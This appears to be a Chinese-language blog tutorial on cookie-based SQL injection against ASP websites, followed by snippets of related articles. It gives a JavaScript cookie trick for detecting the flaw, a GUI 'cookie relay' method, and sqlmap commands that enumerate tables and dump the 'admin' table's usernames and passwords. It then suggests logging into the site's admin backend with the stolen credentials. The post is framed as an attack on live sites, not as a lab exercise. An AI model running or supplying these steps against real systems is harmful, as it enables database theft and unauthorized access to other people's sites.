cookie中转注入,使用sqlmap中转注入

最新推荐文章于 2023-10-10 12:41:22 发布
最新推荐文章于 2023-10-10 12:41:22 发布
阅读量7.3k 收藏 5
点赞数 2
分类专栏: 渗透 文章标签: 判断是否有cookie注入 cookie中转使用 sqlmap的cookie注入 cookie使用到的工具 sqlmap的cookie命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36512966/article/details/70972814
版权

一,判断是否有cookie注入:

目标网站http://www.xxx.com/x.asp?id=1

1.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。

2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));(添加cookie信息),再次访问http://www.xxx.com/x.asp?(加载页面,显示正常)。此时这个网页就存在cookie注入,反之没有。

 

二,利用cookie中转注入:

     使用的工具有: 手工注入辅助工具+明小子,Sqlmap。

 

 

手工注入辅助工具+明小子:

 

1.输入url,然后点击转到。如图


2.点击Cookie中转,之后会跳出一个新的url 如图


3.打开明小子,利用这个url。如图


4.开始检测 如图


2.利用Sqlmap Cookie注入:

1.命令:sqlmap.py –u”url” --cookie “参数” --level 2

注:例如目标网站为:http://www.xxx.com/x.asp?id=1,则sqlmap命令为sqlmap.py –u”http://www.xxx.com/x.asp” --cookie “id=1” --level 2


2.执行命令: sqlmap.py –u”url” --cookie “参数” --level 2 --tables(查所有表)如图


3.执行命令:sqlmap.py –u”url” --cookie“参数” --level 2 --tables --columns –T”admin”(查询列名)


4.执行命令: sqlmap.py –u”url” --cookie “参数” --level 2 --tables --dump –C”usernma,paasword” –T”admin”(查询字段)


OK,两种方法都可以使用。成功拿到帐号密码之后,接下就找后台管理登入进去,这里就不多介绍了。



椰树ii
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP注入使用
05-13
SQLMAP注入使用
Sqlmap2021 -- Cookie注入
weixin_41489908的博客
07-07 3907
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
SQL注入——cookie注入
weixin_74991270的博客
10-10 422
工具很方面,但是IP老是被ban手工虽说很麻烦,但是还是有惊喜的多挖挖src增加实战经验。
手把手带你学习SQLMAP
2301_77147728的博客
03-22 699
表中的所有字段的内容,在这里可以清晰的看到user字段对应的password字段的值,这就是拖库的基本原理,学会了的给个赞。后面一系列的黑科技,由于权限不够,暂时就不分析了,下次有机会咱们再碰一碰。相反,这也说明了权限的重要性。可以看到这里咱们的Cookie是,security=medium表示咱们现在处于中级模式。美滋滋,成功了,抓包重放,屡试不爽,学会的给个赞~这里可以看到,咱们这个漏洞靶场使用的数据库是。选哪张表,你可以看当时自己的心情。可以看到这里咱们的Cookie是,数据库里面,我们获得到。
渗透工具-sqlmap-基本知识及使用教程
m0_59856804的博客
03-02 1470
sqlmap的详细使用教程
利用漏洞注入(sql注入
xianyunb的博客
06-21 283
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者。
sqlmap注入漏洞测试
02-22
资源内容:sqlmap注入漏洞测试
sqlmap sql 注入测试工具
最新发布
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
sqlmap注入神器
12-30
sqlmap是一款注入神器,灵活的运作它将是你更有效率的完成工作
sqlmap之POST注入cookie注入
热门推荐
ve9etable的博客
10-28 2万+
零、POST注入 POST和GET POST和GET是HTTP的两种请求方法,并且是两种最常用的请求方法 GET一般指向指定资源请求数据,而POST则是要向指定资源提交需要被处理的数据 查询字符串是在 GET 请求的 URL 中发送的,类似于这样 而POST查询字符串是在 请求的 HTTP 消息主体中发送的,类似于这样 ...
【学习笔记】asp中的中转注入和消息头注入
chualam的博客
11-12 226
中转注入原理 我们都知道request. querystring是get,request. form是post。而一般人为了方便都是直接使用request("")的方式请求,没有明确用哪种请求方式,asp的解析顺序是先get后post然后cookie传输 ,这里的中转注入就是利用了cookie注入的方法 怎么检测? 例如网站xx. com/?id=1 把id给去掉 就无法显示正常页面,因为没有传递参数。 这时在ie浏览器中输入JavaScript:alert(document.cookie=“id=”+es
sqlmap对dvwa SQL Injection进行带cookie注入
m0_63283172的博客
02-27 788
sqlmap对dvwa中输入点进行带cookie注入测试
测试工具-sqlmap
weixin_42902126的博客
06-27 4171
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
Web漏洞分析(dvwa、SQL手工注入sqlmap注入)
王陈锋的博客
11-07 3168
借助Web漏洞教学和演练的开源工具DVWA,学习并了解Web漏洞(以SQL注入为例)的原理及利用,验证SQL注入漏洞的实现过程及结果,并思考应对web漏洞风险的策略与手段。1、操作系统:windows 7/8/10等2、开发环境:DVWA。
实战sqlmap绕过WAF
zkaqlaoniao的博客
10-26 3801
前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxx..
Web安全原理剖析(九)——cookie注入攻击
Phantom03167的博客
09-27 1万+
cookie注入攻击
sqlmap之(五)----Cookie注入实战
你身后的人
04-21 1160
(1) cookie注入,猜解表  [html] view plain copy sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2    do you want to URL encode cookie values (implementation specific)? [Y/n...
SQLMAP渗透笔记之Cookie中转注入
Birdman-one的博客
12-26 2594
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之Cookie中转注入                                       ---------------
如何使用sqlmap进行sql注入验证
05-30
使用sqlmap进行SQL注入验证需要以下步骤: 1. 安装sqlmap工具 2. 找到目标网站并确定注入点 3. 确定注入点类型(GET, POST, Cookie等) 4. 使用sqlmap进行注入测试 具体步骤如下: 1. 安装sqlmap工具 在Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值